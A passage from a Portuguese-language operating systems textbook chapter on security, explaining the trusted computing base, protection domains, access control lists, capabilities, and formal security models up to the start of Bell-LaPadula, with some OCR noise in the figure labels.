tam defeitos estúpidos de fato no programa de e-mail, 
há pouco que uma mensagem ASCII que chega possa 


fazer para danificar um sistema computacional (na re- 
alidade veremos alguns ataques possíveis mais tarde 
neste capítulo). Então as pessoas tiveram a ideia de ex- 
pandir o e-mail para incluir outros tipos de documentos, 
por exemplo, arquivos de Word, que podem conter pro- 
gramas aos montes. Ler um documento desses significa 
executar o programa de outra pessoa em seu compu- 
tador. Não importa quanto sandboxing (caixa de areia) 
está sendo usado, executar um programa externo no seu 
computador é inerentemente mais perigoso do que olhar 
para um texto ASCII. Os usuários demandaram a capa- 
cidade de mudar o e-mail de documentos passivos para 
programas ativos? É provável que não, mas alguém 
achou que era uma bela ideia, sem se preocupar muito 
com as implicações de segurança. 

O segundo exemplo é a mesma coisa para páginas 
da web. Quando a web consistia em páginas HTML 
passivas, isso não apresentava um problema maior de 
segurança. Agora que muitas páginas na web contêm 
programas (applets e JavaScript) que o usuário precisa 
executar para ver o conteúdo, uma falha de segurança 
aparece depois da outra. Tão logo uma foi consertada, 
outra toma o seu lugar. Quando a web era inteiramen- 
te estática, os usuários protestavam por mais conteúdo 
dinâmico? Não que os autores se lembrem, mas sua 
introdução trouxe consigo um monte de problemas de 
segurança. Parece que o “vice-presidente-responsável- 
-por-dizer-não” dormiu no ponto. 

Na realidade, existem algumas organizações que 
acreditam que uma boa segurança é mais importante do 
que recursos novos bacanas, e o exército é um grande 
exemplo disso. Nas seções a seguir examinaremos algu- 
mas das questões envolvidas. Para construir um sistema 
seguro, é preciso um modelo de segurança no núcleo 
do sistema operacional simples o suficiente para que os 
projetistas possam realmente compreendê-lo, e resistir 
a todas as pressões para se desviar disso a fim de acres- 
centar novos recursos. 


9.2.2 Base computacional confiável 


No mundo da segurança, as pessoas muitas vezes 
falam sobre sistemas confiáveis, em vez de sistemas 
de segurança. São sistemas que têm exigências de se- 
gurança declaradas e atendem a essas exigências. No 
cerne de cada sistema confiável há uma TCB (Trusted 
Computing Base — Base Computacional Confiável) 
mínima consistindo no hardware e software necessá- 
rios para fazer valer todas as regras de segurança. Se a 
base de computação confiável estiver funcionando de 
acordo com a especificação, a segurança do sistema não 


pode ser comprometida, não importa o que mais estiver 
errado. 

A TCB consiste geralmente na maior parte do hard- 
ware (exceto dispositivos de E/S que não afetam a segu- 
rança), uma porção do núcleo do sistema operacional e 
a maioria ou todos os programas de usuário que tenham 
poder de superusuário (por exemplo, programas SE- 
TUID de usuário root em UNIX). Funções de sistema 
operacional que devem fazer parte da TCB incluem a 
criação de processos, troca de processos, gerenciamento 
de memória e parte do gerenciamento de arquivos e E/S. 
Em um projeto seguro, muitas vezes a TCB ficará bem 
separada do resto do sistema operacional a fim de mini- 
mizar o seu tamanho e verificar a sua correção. 

Uma parte importante da TCB é o monitor de re- 
ferência, como mostrado na Figura 9.2. O monitor de 
referência aceita todas as chamadas de sistema envol- 
vendo segurança, como a abertura de arquivos, e decide 
se elas devem ser processadas ou não. Desse modo, o 
monitor de referência permite que todas as decisões de 
segurança sejam colocadas em um lugar, sem a possibi- 
lidade de desviar-se dele. A maioria dos sistemas opera- 
cionais não é projetada dessa maneira, o que é parte da 
razão para eles serem tão inseguros. 

Uma das metas de algumas pesquisas de seguran- 
ça atuais é reduzir a base computacional confiável de 
milhões de linhas de código para meramente dezenas 
de milhares de linhas de código. Na Figura 1.26 vimos 
a estrutura do sistema operacional MINIX 3, que é 
um sistema em conformidade com o POSIX, mas com 
uma estrutura radicalmente diferente do Linux ou 
FreeBSD. Como MINIX 3, apenas em torno de 10.000 
linhas de código executam no núcleo. Todo o resto 
executa como um conjunto de processos do usuário. 
Alguns desses, como o sistema de arquivos e o geren- 
ciador de processos, são parte da base computacional 


(ejb) 57M) Um monitor de referência. 
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confiável, já que eles podem facilmente comprome- 
ter a segurança do sistema. Mas outras partes, como 
o driver da impressora e o driver do áudio, não fazem 
parte da base computacional confiável e independente 
do que há de errado com elas (mesmo que estejam 
contaminadas por um vírus), não há nada que possam 
fazer para comprometer a segurança do sistema. Ao 
reduzir a base computacional confiável por duas or- 
dens de magnitude, sistemas como o MINIX 3 têm 
como potencialmente oferecer uma segurança muito 
mais alta do que os projetos convencionais. 


9.3 Controlando o acesso aos recursos 


A segurança é muito mais fácil de atingir se há um 
modelo claro do que deve ser protegido e quem tem per- 
missão para fazer o quê. Uma quantidade considerável 
de trabalho foi dedicada a essa área, então só poderemos 
arranhar a superfície nesse breve tratamento. Vamos nos 
concentrar em alguns modelos gerais e os mecanismos 
usados para serem cumpridos. 


9.3.1 Domínios de proteção 


Um sistema computacional contém muitos recursos, 
ou “objetos”, que precisam ser protegidos. Esses obje- 
tos podem ser hardware (por exemplo, CPUs, páginas 
de memória, unidades de disco, ou impressoras) ou soft- 
wares (por exemplo, processos, arquivos, bancos de da- 
dos ou semáforos). 

Cada objeto tem um nome único pelo qual ele é refe- 
renciado, assim como um conjunto finito de operações 
que os processos têm permissão de executar. As opera- 
ções read e write são apropriadas para um arquivo; up e 
down fazem sentido para um semáforo. 


Espaço 
r do usuário 
Todas as chamadas de sistema passam 
pelo monitor de referência para verificar 
a segurança. 
\ Espaço 
do núcleo 


Base computacional confiável 


Núcleo do sistema operacional 
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É óbvio que é necessária uma maneira para proibir os 
processos de acessar objetos que eles não são autoriza- 
dos a acessar. Além disso, também deve tornar possível 
restringir os processos a um subconjunto de operações 
legais quando isso for necessário. Por exemplo, o proces- 
so A pode ter o direito de ler — mas não de escrever — 
arquivo F. 

A fim de discutir diferentes mecanismos de proteção, 
é interessante introduzirmos o conceito de um domínio. 
Um domínio é um conjunto de pares (objetos, direitos). 
Cada par especifica um objeto e algum subconjunto das 
operações que podem ser desempenhadas nele. Um di- 
reito nesse contexto significa a permissão para desem- 
penhar uma das operações. Muitas vezes um domínio 
corresponde a um único usuário, dizendo o que ele pode 
fazer ou não fazer, mas um domínio também pode ser 
mais geral do que apenas um usuário. Por exemplo, os 
membros de uma equipe de programação trabalhando 
em algum projeto podem todos pertencer ao mesmo do- 
minio, de maneira que todos possam acessar os arqui- 
vos do projeto. 

Como objetos são alocados para domínios depende 
das questões específicas relativas a quem precisa sa- 
ber o quê. Um conceito básico, no entanto, é o POLA 
(Principle of Least Authority — Princípio da Menor 
Autoridade) ou necessidade de saber. Em geral, a se- 
gurança funciona melhor quando cada domínio tem os 
objetos e os privilégios mínimos para realizar o seu tra- 
balho — e nada mais. 

A Figura 9.3 exibe três domínios, mostrando os 
objetos em cada um e os direitos (Read, Write, eXe- 
cute) disponíveis em cada objeto. Observe que Im- 
pressoral está em dois domínios ao mesmo tempo, 
com os mesmos direitos em cada. Arquivo! também 
está em dois domínios, com diferentes direitos em 
cada um. 

Atodo instante, cada processo executa em algum do- 
mínio de proteção. Em outras palavras, há alguma cole- 
ção de objetos que ele pode acessar, e para cada objeto 
ele tem algum conjunto de direitos. Processos também 
podem trocar de domínio para domínio durante a exe- 
cução. As regras para a troca de domínios são altamente 
dependentes do sistema. 


eE] Três domínios de proteção. 
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Arquivo1[R] 
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Dominio 2 


Arquivo4[RWX] 


A fim de tornar a ideia de um domínio de proteção 
mais concreta, vamos examinar o UNIX (incluindo 
Linux, FreeBSD e amigos). No UNIX, o domínio de 
um processo é definido por sua UID e GID. Quando 
um usuário se conecta, seu shell recebe o UID e GID 
contidos em sua entrada no arquivo de senha e esses 
são herdados por todos os seus filhos. Dada qualquer 
combinação (UID, GID), é possível fazer uma lis- 
ta completa de todos os objetos (arquivos, incluindo 
dispositivos de E/S representados por arquivos espe- 
ciais etc.) que possam ser acessados, e se eles podem 
ser acessados para leitura, escrita ou execução. Dois 
processos com a mesma combinação (UID, GID) te- 
rão acesso a exatamente o mesmo conjunto de objetos. 
Processos com diferentes valores (UID, GID) terão 
acesso a um conjunto diferente de arquivos, embora 
possa ocorrer uma sobreposição considerável. 

Além disso, cada processo em UNIX tem duas me- 
tades: a parte do usuário e a parte do núcleo. Quando o 
processo realiza uma chamada de sistema, ele troca da 
parte do usuário para a do núcleo. A parte do núcleo tem 
acesso a um conjunto diferente de objetos da parte do 
usuário. Por exemplo, o núcleo pode acessar todas as 
páginas na memória física, o disco inteiro, assim como 
todos os recursos protegidos. Desse modo, uma chama- 
da de sistema causa uma troca de domínio. 

Quando um processo realiza um exec em um arqui- 
vo com o bit SETUID ou SETGID nele, ele adquire um 
novo UID ou GID efetivo. Com uma combinação (UID, 
GID) diferente, ele tem um conjunto diferente de arqui- 
vos e combinações disponível. Executar um programa 
com SETUID ou SETGID também é uma troca de do- 
mínio, já que os direitos disponíveis mudam. 

Uma questão importante é como o sistema controla 
quais objetos pertencem a qual domínio. Conceitualmen- 
te, pelo menos, podemos visualizar uma matriz grande, 
em que as linhas são os domínios e as colunas os objetos. 
Cada quadrado lista os direitos, se houver, que o domi- 
nio contém para o objeto. A matriz para a Figura 9.3 é 
mostrada na Figura 9.4. Dada essa matriz e o número do 
domínio atual, o sistema pode dizer se um acesso a um 
dado objeto de uma maneira em particular a partir de 
um dominio específico é permitido. 


Domínio 3 











Arquivo6[RWX] 






Impressora1 [W] 






Plotter2[W] 


eE] Uma matriz de proteção. 


Arquivo 
Domínio 7 
1 Leitura Leitura 
Escrita 


Leitura 
Escrita 


2 Leitura 
Execução 


A troca de dominio em si pode ser facilmente incluí- 
da no modelo da matriz ao percebermos que um domi- 
nio é em si um objeto, com a operação enter. A Figura 
9.5 mostra a matriz da Figura 9.4 de novo, apenas agora 
com os três domínios como objetos em si. Os processos 
no domínio 1 podem trocar para o domínio 2, mas, uma 
vez ali, eles não podem voltar. Essa situação apresenta 
um modelo de execução de um programa SETUID em 
UNIX. Nenhuma outra troca de domínio é permitida 
nesse exemplo. 


9.3.2 Listas de controle de acesso 


Na prática, realmente armazenar a matriz da Figura 
9.5 é algo raramente feito, pois ela é grande e espar- 
sa. A maioria dos domínios não tem acesso algum à 
maioria dos objetos, de maneira que armazenar uma 
matriz muito grande e em sua maior parte vazia é um 
desperdício de espaço de disco. Dois métodos práti- 
cos, no entanto, são armazenar a matriz por linhas ou 
por colunas, e então armazenar somente os elemen- 
tos não vazios. As duas abordagens são surpreenden- 
temente diferentes. Nesta seção examinaremos como 
armazená-la por colunas; na próxima seção estudare- 
mos armazená-la por linhas. 

A primeira técnica consiste em associar com cada 
objeto uma lista (ordenada) contendo todos os domínios 


(FIGURA 9.5] Uma matriz de proteção com os dominios como objetos. 
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Objeto 
Arquivo2 Arquivo3 Arquivo4 Arquivo5 


Arquivo6 Impressoral Plotter2 
o e] 
Leitura 
Escrita Escrita Escrita 
Execução 


que possam acessar o objeto, e como. Essa lista é cha- 
mada de ACL (Access Control List — Lista de Contro- 
le de Acesso), ilustrada na Figura 9.6. Aqui vemos três 
processos, cada um pertencendo a um domínio diferen- 
te, A, B e C, e três arquivos FI, F2 e F3. Para simplificar 
a questão, presumiremos que cada dominio corresponde 
a exatamente um usuário, nesse caso, os usuários Á, B e 
C. Muitas vezes na literatura de segurança os usuários 
são chamados de sujeitos ou principais, para contrastá- 
-los com as coisas que são de propriedade, os objetos, 
como arquivos. 

Cada arquivo tem uma ACL associada com ele. O ar- 
quivo F1 tem duas entradas na sua ACL (separadas por 
um ponto e vírgula). A primeira entrada diz que qual- 
quer processo de propriedade de um usuário Æ pode ler 
e escrever o arquivo. A segunda entrada diz que qual- 
quer processo de propriedade de um usuário B pode ler 
o arquivo. Todos os outros acessos por esses usuários 
e todos os acessos por outros usuários são proibidos. 
Observe que os direitos são concedidos por usuário, não 
por processo. No que diz respeito ao sistema de prote- 
ção, qualquer processo de propriedade de um usuário 4 
pode ler e escrever o arquivo F7. Não importa se há um 
processo desses ou 100 deles. É o proprietário, não a 
identidade do processo, que importa. 

O arquivo F2 tem três entradas em sua ACL: 4, B 
e C podem todos eles ler o arquivo, e B também pode 
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ale WeRS Uso de listas de controle de acesso para gerenciar o acesso a arquivos. 


Proprietário 


Processo C 


escrevê-lo. Nenhum outro acesso é permitido. O arqui- 
vo F3 é aparentemente um programa executável, tendo 
em vista que tanto B quanto C podem lê-lo e executá-lo. 
B também pode escrevê-lo. 

Esse exemplo ilustra a forma mais básica de prote- 
ção com ACLs. Sistemas mais sofisticados são muitas 
vezes usados na prática. Para começo de conversa, mos- 
tramos apenas três direitos até o momento: read, write 
e execute (ler, escrever e executar). Pode haver direitos 
adicionais também. Alguns desses podem ser genéricos, 
isto é, aplicar-se a todos os objetos, e alguns podem ser 
específicos de objetos. Exemplos de direitos genéricos 
são destroy object e copy object (destruir objeto e co- 
piar objeto). Esses poderiam manter-se para qualquer 
objeto, não importa o tipo dele. Direitos específicos de 
objetos podem incluir append message (anexar mensa- 
gem) para um objeto de caixa de correio e sort alpha- 
betically para um objeto de diretório. 

Até o momento, nossas entradas de ACL foram para 
usuários individuais. Muitos sistemas dão suporte ao 
conceito de um grupo de usuários. Grupos têm nomes 
e podem ser incluídos em ACLs. Duas variações na se- 
mântica dos grupos são possíveis. Em alguns sistemas, 
cada processo tem uma ID de usuário (UID) e uma ID 
de grupo (GID). Nesses sistemas, uma entrada de ACL 
contém entradas da forma 


UID1, GID1: direitos1; UID2, GID2: direitos2; ... 


Nessas condições, quando uma solicitação é feita 
para acessar um objeto, uma conferência é feita usando 
o UID e GID de quem está chamando. Se elas estiverem 
presentes na ACL, os direitos listados estão disponíveis. 
Se a combinação (UID, GID) não estiver na lista, o 
acesso não é permitido. 

Usar os grupos dessa maneira efetivamente intro- 
duz o conceito de um papel. Considere uma instalação 
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computacional na qual Tana é a administradora do siste- 
ma, e desse modo no grupo sysadm. No entanto, suponha 
que a empresa também tenha alguns clubes para empre- 
gados e Tana seja um membro do clube de admiradores 
de pombos. Os membros do clube pertencem ao grupo 
fanpombo e têm acesso aos computadores da empresa 
para gerenciar seu banco de dados de pombos. Uma por- 
ção da ACL pode ser como mostrado na Figura 9.7. 

Se Tana tentar acessar um desses arquivos, o resul- 
tado dependerá de qual grupo ela está atualmente co- 
nectada como. Quando ela se conecta, o sistema pode 
lhe pedir para escolher qual dos seus grupos ela está 
atualmente usando, ou pode haver até nomes e/ou se- 
nhas de acesso diferentes para mantê-los separados. 
O ponto desse esquema é evitar que Tana acesse o ar- 
quivo de senha quando ela estiver usando seu chapéu de 
admiradora de pombos. Ela só pode fazer isso quando 
estiver conectada como a administradora do sistema. 

Em alguns casos, um usuário pode ter acesso a deter- 
minados arquivos independente de a qual grupo ele es- 
tiver atualmente conectado. Esse caso pode ser cuidado 
introduzindo-se o conceito de um caractere curinga (wild- 
card), que significa todo mundo. Por exemplo, a entrada 


tana, *: RW 


para o arquivo de senha daria a Tana acesso, não impor- 
ta em qual grupo ela esteja atualmente. 

Outra possibilidade ainda é a de que se um usuário 
pertence a qualquer um dos grupos que têm determi- 
nados direitos de acesso, o acesso é permitido. A van- 
tagem aqui é que um usuário pertencendo a múltiplos 
grupos não precisa especificar qual usar no momento do 
login. Todos eles contam o tempo inteiro. Uma desvan- 
tagem dessa abordagem é que ela proporciona menos 
encapsulamento: Tana pode editar o arquivo de senha 
durante um encontro do clube de pombos. 


le PARA Duas listas de controle de acesso. 





Arquivo Lista de controle de acesso 





Senha tana, sysadm: RW 











Dados pombos | bill, fanpombo: RW; tana, fanpombo: RW; ... 





O uso de grupos e wildcards introduz a possibilida- 
de de bloquear seletivamente um usuário específico de 
acessar um arquivo. Por exemplo, a entrada 


virgil, *: (none); *, *: RW 


dá ao mundo inteiro, exceto, para Virgil, acesso para ler 
e escrever no arquivo. Isso funciona porque as entradas 
são escaneadas em ordem, e a primeira que se aplicar é 
levada em consideração; entradas subsequentes não são 
nem examinadas. Um casamento é encontrado para Vir- 
gil na primeira entrada, assim como direitos de acesso, 
nesse caso, “none” (nenhum) é encontrado e aplicado. 
A busca é encerrada nesse ponto. O fato de que o resto 
do mundo tem acesso jamais chega nem a ser visto. 

A outra maneira de lidar com grupos é não ter as 
entradas ACL consistindo em pares (UID, GID), mas 
ter cada entrada com um UID ou um GID. Por exemplo, 
uma entrada para o arquivo dados pombos poderia ser 


debbie: RW; phil: RW; fanpombo:RW 


significando que Debbie e Phil, e todos os membros do 
grupo fanpombo têm acesso de leitura e escrita ao arquivo. 

Às vezes ocorre que um usuário ou grupo tem de- 
terminadas permissões em relação a um arquivo que 
o proprietário mais tarde gostaria de revogar. Com as 
listas de controle de acesso, revogar um acesso ante- 
riormente concedido é algo relativamente direto. Tudo 
o que precisa ser feito é editar a ACL para fazer a 
mudança. No entanto, se a ACL for conferida apenas 
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quando um arquivo for aberto, é mais provável que 
a mudança terá efeito somente em chamadas futuras 
para open. Qualquer arquivo que já está aberto conti- 
nuará a ter os direitos que ele tinha quando foi aber- 
to, mesmo que o usuário não esteja mais autorizado a 
acessar o arquivo. 


9.3.3 Capacidades 


A outra maneira de dividir a matriz da Figura 9.5 é 
por linhas. Quando esse método é usado, associado com 
cada processo há uma lista de objetos que podem ser 
acessados, junto com uma indicação de quais operações 
são permitidas em cada um, em outras palavras, seu do- 
mínio. Essa lista é chamada de lista de capacidades 
(ou lista C) e os itens individuais nela são chamados de 
capacidades (DENNIS e VAN HORN, 1966; FABRY, 
1974). Um conjunto de três processos e suas listas de 
capacidades é mostrado na Figura 9.8. 

Cada capacidade concede ao proprietário determina- 
dos direitos sobre um certo objeto. Na Figura 9.8, o pro- 
cesso de propriedade do usuário 4 pode ler os arquivos 
F1 e F2, por exemplo. Em geral, uma capacidade con- 
siste em um arquivo (ou, mais geralmente, um objeto) 
identificador e um mapa de bits para os vários direitos. 
Em um sistema do tipo UNIX, o identificador do arqui- 
vo provavelmente seria o número do i-node. Listas de 
capacidades são em si objetos e podem ser apontadas 
por outras listas de capacidades, desse modo facilitando 
o compartilhamento de subdomínios. 

Deve estar bastante claro que listas de capacidades 
devem ser protegidas da adulteração por usuários. Três 
métodos para protegê-las são conhecidos. O primeiro 
exige uma arquitetura marcada (tagged), um projeto 
de hardware no qual cada palavra de memória tem um 
bit (ou marca) extra que diz se a palavra contém uma 


Jeil]: We: Quando as capacidades são usadas, cada processo tem uma lista de capacidades. 
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capacidade ou não. O bit de marca não é usado por ins- 
truções de aritmética, comparação ou similares, e pode 
ser modificado apenas por programas executando no 
modo núcleo (isto é, o sistema operacional). Máquinas 
de arquitetura marcada foram construídas e podem ser 
feitas para trabalhar bem (FEUSTAL, 1972). A AS/400 
da IBM é um exemplo popular. 

A segunda maneira é manter a lista C dentro do siste- 
ma operacional. As capacidades são então referenciadas 
por sua posição na lista de capacidades. Um processo 
pode dizer: “Leia 1 KB do arquivo apontado pela ca- 
pacidade 2.” Essa forma de abordagem é similar ao uso 
dos descritores de arquivos em UNIX. Hydra (WULF et 
al., 1974) funcionava dessa maneira. 

A terceira maneira é manter a lista C no espaço do 
usuário, mas gerenciar as capacidades criptografica- 
mente de maneira que usuários não possam adulterá- 
-las. Essa abordagem é particularmente adequada para 
sistemas distribuídos e funciona da seguinte forma. 
Quando um processo cliente envia uma mensagem para 
um servidor remoto, por exemplo, um servidor de ar- 
quivos, para criar um objeto para ele, o servidor cria o 
objeto e gera um longo número aleatório, o campo de 
conferência, para ir junto com ele. Uma lacuna na tabela 
de arquivos do servidor é reservada para o objeto e o 
campo de conferência é armazenado ali juntamente com 
os endereços dos blocos de disco. Em termos de UNIX, 
o campo de conferência é armazenado no servidor no 
i-node. Ele não é enviado de volta para o usuário e ja- 
mais colocado na rede. O servidor então gera e retorna 
uma capacidade para o usuário na forma mostrada na 
Figura 9.9. 

A capacidade devolvida para o usuário contém o 
identificador do servidor, o número do objeto (o índi- 
ce nas tabelas do servidor, essencialmente o número 
do i-node) e os direitos, armazenados como um mapa 
de bits. Para um objeto recentemente criado, todos os 
bits de direitos são ativados, é claro, pois o proprietário 
pode fazer tudo. O último campo consiste na concatena- 
ção do objeto, direitos e campo de conferência através 
de uma função de mão única criptograficamente segura, 
f. Uma função de mão única criptograficamente segura 
é uma função y = f(x) que tem a propriedade de que 
dado x, é fácil encontrar y, mas dado y, é computacio- 
nalmente impossível encontrar x. Elas serão discutidas 
em detalhe na Seção 9.5. Por ora, basta saber que com 
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uma boa função de mão única, mesmo um atacante de- 
terminado não será capaz de adivinhar o campo de con- 
ferência, ainda que ele conheça todos os outros campos 
na capacidade. 

Quando um usuário quiser acessar o objeto, ele en- 
viará a capacidade para o servidor como parte da solici- 
tação. O servidor então extrairá o número do objeto para 
indexá-lo em suas tabelas para encontrar o objeto. Ele 
então calcula Objeto, Direitos, Conferência), tomando 
os dois primeiros parâmetros da própria capacidade e o 
terceiro das suas próprias tabelas. Se o resultado con- 
cordar com o quarto campo na capacidade, a solicitação 
é honrada; de outra maneira, ela é rejeitada. Se um usu- 
ário tentar acessar o objeto de outra pessoa, ele não será 
capaz de fabricar o quarto campo corretamente, tendo 
em vista que ele não conhece o campo de conferência, e 
a solicitação será rejeitada. 

Um usuario pode pedir ao servidor para produzir 
uma capacidade mais fraca, por exemplo, para acesso 
somente de leitura. Primeiro, o servidor verifica que a 
capacidade é valida. Se afirmativo, ele calcula Objeto, 
Novos direitos, Conferência) e gera uma nova capaci- 
dade colocando esse valor no quarto campo. Observe 
que o valor de Conferência original é usado porque ou- 
tras capacidades em aberto dependem dele. 

Essa nova capacidade é enviada de volta para o 
processo que a está solicitando. O usuário pode ago- 
ra dar isso a um amigo simplesmente enviando-a em 
uma mensagem. Se o amigo ativar bits de direitos que 
deveriam estar desativados, o servidor detectará isso 
quando a capacidade for usada, desde que o valor de 
f não corresponda ao campo de direitos falsos. Já que 
o amigo não conhece o campo de conferência verda- 
deiro, ele não pode fabricar uma capacidade que cor- 
responda aos bits de direitos falsos. Esse esquema foi 
desenvolvido pelo sistema Amoeba (TANENBAUM 
et al., 1990). 

Além dos direitos dependentes de objetos espe- 
cíficos, como de leitura e execução, as capacidades 
(tanto de núcleo como criptograficamente protegi- 
das) normalmente têm direitos genéricos que são 
aplicáveis a todos os objetos. Exemplos de direitos 
genéricos são 


1. Copiar capacidade: criar uma nova capacidade 
para o mesmo objeto. 

2. Copiar objeto: criar um objeto duplicado com 
uma nova capacidade. 

3. Remover capacidade: apagar uma entrada da lista 
C; objeto não é afetado. 

4. Destruir objeto: remover permanentemente um ob- 
jeto e uma capacidade. 


Uma última observação que vale a pena ser feita a 
respeito dos sistemas de capacidades é que revogar o 
acesso a um objeto é bastante difícil na versão gerencia- 
da pelo núcleo. É difícil para o sistema encontrar todas 
as capacidades em aberto para qualquer objeto as reto- 
mar, tendo em vista que elas podem estar armazenadas 
em listas C por todo o disco. Uma abordagem é fazer 
com que cada capacidade aponte para um objeto indi- 
reto, em vez do objeto em si. Ao ter o objeto indireto 
apontando para o objeto real, o sistema sempre pode 
romper com aquela conexão, desse modo invalidando 
as capacidades. (Quando uma capacidade para o objeto 
indireto é mais tarde apresentada para o sistema, o usu- 
ário descobrirá que o objeto indireto está agora apontan- 
do para um objeto nulo.) 

No esquema Amoeba, a revogação é fácil. Tudo o 
que precisa ser feito é trocar o campo de conferência ar- 
mazenado com o objeto. Com um golpe, todas as capa- 
cidades existentes são invalidadas. No entanto, nenhum 
dos esquemas permite a revogação seletiva, isto é, to- 
mar de volta, digamos, a permissão de John, mas de nin- 
guém mais. Esse defeito é em geral reconhecido como 
sendo um problema com os sistemas de capacidades. 

Outro problema geral é certificar-se de que o pro- 
prietário de uma capacidade válida não dê uma cópia 
para 1.000 dos seus melhores amigos. Ter o núcleo ge- 
renciando as capacidades, como em Hydra, soluciona o 
problema, mas essa solução não funciona bem em um 
sistema distribuído como Amoeba. 

De maneira muito brevemente resumida, ACLs e 
capacidades têm propriedades de certa maneira com- 
plementares. As capacidades são muito eficientes 
porque se um processo diz “Abra o arquivo apontado 
pela capacidade 3” nenhuma conferência é necessá- 
ria. Com ACLs, uma busca (potencialmente longa) da 
ACL pode ser necessária. Se não há suporte a grupos, 
então conceder a todos acesso de leitura a um arquivo 
exige enumerar todos os usuários na ACL. Capacida- 
des também permitem que um processo seja encapsu- 
lado facilmente, enquanto ACLs não o permitem com 
tanta facilidade. Por outro lado, ACLs permitem a 
revogação seletiva dos direitos, o que as capacidades 
não permitem. Por fim, se um objeto é removido e as 
capacidades não o são, ou vice-versa, aparecerão pro- 
blemas. ACLs não sofrem desse problema. 

Amaioria dos usuários está familiarizada com ACLs, 
pois elas são comuns em sistemas operacionais como 
Windows e UNIX. No entanto, capacidades não são 
tão incomuns também. Por exemplo, o núcleo L4 que 
executa em muitos smartphones de muitos fabricantes 
(geralmente ao longo ou por baixo de outros sistemas 
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operacionais como o Android) é baseado em capacida- 
des. Da mesma maneira, o FreeBSD adotou o Capsi- 
cum, trazendo as capacidades para um membro popular 
da família UNIX. 


9.4 Modelos formais de sistemas seguros 


Matrizes de proteção, como aquelas da Figura 9.4, 
não são estáticas. Elas mudam frequentemente à medida 
que novos objetos são criados, antigos são destruídos e 
os proprietários decidem aumentar ou restringir o con- 
junto de usuários para seus objetos. Uma quantidade 
considerável de atenção foi dada para modelar sistemas 
de proteção nos quais a matriz de proteção está cons- 
tantemente mudando. Tocaremos agora brevemente em 
parte desse trabalho. 

Décadas atrás, Harrison et al. (1976) identificaram 
seis operações primitivas na matriz de proteção que 
podem ser usadas como uma base para modelar qual- 
quer sistema de proteção. Essas operações primitivas 
são create object, delete object, create domain, delete 
domain, insert right e remove right (criar objeto, apagar 
objeto, criar domínio, apagar domínio, inserir direito e 
remover direito). As duas últimas primitivas são inserir 
e remover direitos de elementos específicos da matriz, 
como conceder domínio | permissão para ler Arquivo6. 

Essas seis primitivas podem ser combinadas em 
comandos de proteção. São esses comandos de prote- 
ção que os programas do usuário podem executar para 
mudar a matriz. Eles não podem executar as primiti- 
vas diretamente. Por exemplo, o sistema poderia ter um 
comando para criar um novo arquivo, que testaria para 
ver se 0 arquivo já existia e, se não existisse, criar um 
novo objeto e dar ao proprietário todos os direitos sobre 
ele. Poderia haver um comando também para permitir 
que o proprietário concedesse permissão para ler o ar- 
quivo para todos no sistema, na realidade, inserindo o 
direito de “ler” na entrada do novo arquivo em todos os 
domínios. 

Em qualquer instante, a matriz determina o que um 
processo em qualquer domínio pode fazer, não o que 
ele está autorizado a fazer. A matriz é o que é feito va- 
ler pelo sistema; a autorização tem a ver com a política 
de gerenciamento. Como um exemplo dessa distinção, 
vamos considerar o sistema simples da Figura 9.10 no 
qual os domínios correspondem aos usuários. Na Figu- 
ra 9.10(a) vemos a política de proteção intencionada: 
Henry pode ler e escrever caixapostal7, Robert pode ler 
e escrever segredo, e todos os três usuários podem ler e 
executar compilador. 
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KEATEN (a) Um estado autorizado. (b) Um estado não autorizado. 


Objetos 


Compilador Caixa postal 7 Secreto 


. Lê 
Eric 
EM 
Lê Lê 
Executa Escreve 
Lê Lê 
Executa Escreve 
(a) 






Henry 


Robert 


Agora imagine que Robert seja muito inteligente e 
descobriu uma maneira de emitir comandos para ter a 
matriz modificada para a Figura 9.10(b). Ele agora ga- 
nhou acesso a caixapostal7, algo que ele não está au- 
torizado a ter. Se ele tentar lê-lo, o sistema operacional 
levará adiante a sua solicitação, pois ele não sabe que o 
estado da Figura 9.10(b) não está autorizado. 

Deve estar claro agora que o conjunto de todas as 
matrizes possíveis pode ser dividido em dois blocos 
disjuntos: o conjunto de todos os estados autorizados e 
o de todos os não autorizados. Uma questão em torno da 
qual muita pesquisa teórica girou é a seguinte: “Dado um 
estado inicial autorizado e um conjunto de comandos, é 
possível provar que o sistema jamais pode alcançar um 
estado não autorizado?”. 

Na realidade, estamos perguntando se o mecanismo 
disponível (os comandos de proteção) é adequado para 
fazer valer alguma política de proteção. Dada essa po- 
lítica, algum estado inicial da matriz e o conjunto de 
comandos para modificá-la, o que gostaríamos é uma 
maneira de provar que o sistema é seguro. Tal prova é 
bastante difícil de conseguir; muitos sistemas de pro- 
pósito geral não são teoricamente seguros. Harrison et 
al. (1976) provaram que no caso de uma configuração 
arbitrária para um sistema de proteção arbitrário, se- 
gurança é teoricamente indecidível. No entanto, para 
um sistema específico, talvez seja possível provar se 
um sistema pode um dia ir de um estado autorizado 
para um não autorizado. Para mais informações, ver 
Landwehr (1981). 


9.4.1 Segurança multinível 


A maioria dos sistemas operacionais permite que os 
usuários individuais determinem quem pode ler e es- 
crever nos seus arquivos e outros objetos. Essa política 
é chamada de controle de acesso discricionário. Em 
muitos ambientes esse modelo funciona bem, mas há 
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outros ambientes em que uma segurança muito mais ri- 
gida é necessária, como no exército, departamentos de 
patentes corporativas e hospitais. Nesses ambientes, a 
organização tem regras estabelecidas sobre quem pode 
ver o quê, e elas não podem ser modificadas por sol- 
dados, advogados ou médicos individuais, pelo menos 
não sem conseguir uma permissão especial do chefe (e 
provavelmente dos advogados do chefe também). Esses 
ambientes precisam de controles de acesso obrigató- 
rios para assegurar que as políticas de segurança esta- 
belecidas sejam implementadas pelo sistema, além dos 
controles de acesso discricionário padrão. O que esses 
controles de acesso obrigatórios fazem é regulamentar o 
fluxo de informações, para certificar-se de que elas não 
vazem de uma maneira que não devem. 


Modelo Bell-LaPadula 


O modelo de segurança multinível mais amplamente 
usado é o modelo Bell-LaPadula, então começaremos 
por ele (BELL e LAPADULA, 1973). Esse modelo foi 
projetado para lidar com segurança militar, mas também 
é aplicável a outras organizações. No mundo militar, do- 
cumentos (objetos) podem ter um nível de segurança, 
como não classificado, confidencial, secreto e altamente 
secreto. As pessoas também são designadas com esses 
níveis, dependendo de quais documentos elas têm per- 
missão de ver. A um general pode-se permitir ver todos 
os documentos, enquanto um tenente pode ser restrin- 
gido a documentos classificados como confidenciais ou 
menos do que isso. Um processo executando em prol 
de um usuário adquire o nível de segurança do usuário. 
Como há múltiplos níveis de segurança, esse esquema é 
chamado de um sistemas de segurança multinível. 

O modelo Bell-LaPadula tem regras sobre como a 
informação pode fluir: 


